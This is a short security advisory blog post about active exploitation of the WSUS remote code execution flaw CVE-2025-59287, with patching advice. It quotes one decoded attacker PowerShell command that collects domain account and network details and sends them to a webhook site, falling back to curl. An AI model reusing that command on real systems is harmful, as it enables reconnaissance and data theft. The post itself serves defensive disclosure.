EXPEL BLOG

Security alert: WSUS remote code execution vulnerability

a featured image on a blog about CVE-2025-59287 - WSUS remote code execution vulnerability

Rapid response · 2 MIN READ · AARON WALTON · OCT 24, 2025

TL;DR

  • A critical vulnerability in Windows Server Update Service (WSUS) is actively under exploitation
  • A patch exists for the vulnerability and should be applied as soon as possible
  • Current attack chains observed show reconnaissance early in the attack chain, but other types of attacks are just as likely

 

What happened?

A critical vulnerability—now named CVE-2025-59287—was identified in Windows Server Update Service (WSUS), and attackers are actively exploiting it. The vulnerability impacts internet-exposed servers running WSUS. If the attacker is successful, it allows them to run commands with SYSTEM privileges.

In the incidents we observed, the attacker uses this access to execute PowerShell. The PowerShell command is base64 encoded and decodes to the following commands:

try{$r= (&{echo http[:]//[Victim IP]:8530; net user /domain; ipconfig /all} |out-string)+ $Error }catch{$_.ToString()} ;$w=”http://webhook[.]site/[redacted]”;try{iwr -UseBasicParsing -Uri $w -Body $r -Method Put}catch{curl.exe -k $w –data-binary $r}

The command does the following:

  • Prints the victim’s IP address and port for the attacker to come back later
  • Checks information about the user accounts in the domain
  • Checks the device’s network configuration settings
  • Packages all the information from the first three bits and sends it to webhook[.]site where the actor can recover the information later. Webhook[.]site is a legitimate website normally used for testing, but its capability can be leveraged in attacks like this one. In the instances we observed, the information was no longer available on webhook[.]site, which may indicate action taken by the website in response to evidence of abuse.
  • The PowerShell attempts to exfiltrate the data using PowerShell, but if it fails to do so, it will fall back to using curl to send the information.

Searching for this type of activity can help identify current ways attackers are exploiting this vulnerability, but it is important to know that other attack chains could be leveraged just as easily. We expect other attackers to target systems in due time.

 

What should you do right now?

If your organization uses WSUS, it is important to patch servers to the latest version. We recommend doing this even if the WSUS instance isn’t exposed to the internet. Due to accidental misconfigurations or unforeseen situations, these servers could be exposed and become a risk.

 

Why does it matter?

This vulnerability doesn’t require user interaction and is easily exploitable when the right conditions exist: namely, a WSUS server that is publicly accessible. When exploited, the WSUS server can function as an attacker’s first foothold into a network, granting them the highest possible privileges on the device to continue their attack from there.

 

What’s next?

We’ll update this post with big developments, but if you or your team have any additional questions regarding this vulnerability or information regarding signs of exploitation, please reach out to us.

Blog home